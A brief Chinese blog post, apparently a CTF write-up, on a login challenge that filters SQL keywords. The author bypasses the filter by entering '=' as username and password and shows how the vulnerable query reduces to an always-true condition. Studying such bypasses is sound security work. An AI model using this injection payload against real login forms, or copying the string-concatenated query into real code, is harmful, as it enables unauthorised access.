版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/zz_Caleb/article/details/85063239
题目上说:不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!
可以试试,只要是输入的关键字都被过滤了,双写也被过滤掉了。
用万能密码发现,or被过滤掉了。
这里用到的是admin为:'=',密码为:'='。
原理就是用的SQL语句的查询。
内部的查询语句:
$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;输入'='后,查询语句为:
$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;这样就相当于:
$sql = “select user from flag where 1 and 1”;可以去MySQL里试试。
这样就爆出了所有的用户,也拿到了flag。